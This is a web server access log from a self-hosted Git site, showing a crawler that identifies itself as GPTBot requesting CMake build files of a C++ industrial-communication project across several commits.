"/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 14920] [Gzip 9.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:28:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 11323] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:28:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 11307] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:28:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11368] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:28:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 11306] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:28:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11342] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:28:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10023] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:28:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 9982] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10265] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 116] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 64] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10360] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:28:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10008] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:28:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10270] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:28:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10013] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:28:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10295] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:28:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9995] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:28:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10270] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:28:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10011] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:28:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10022] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:28:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 64] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:28:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 116] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:28:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:28:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 116] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:28:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10360] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:28:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:28:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 11278] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:28:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10326] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:28:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 11302] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:28:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 11300] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:28:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 11272] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11729] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:28:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/update_status.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/update_status.py" +[17/Feb/2026:16:28:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/update_status.py" +[17/Feb/2026:16:28:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11691] [Gzip 3.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11729] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13149] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13180] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10236] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:28:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9986] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:28:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10004] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:28:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10204] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:28:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10205] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:28:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10175] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:28:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 9976] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:28:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11709] [Gzip 3.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 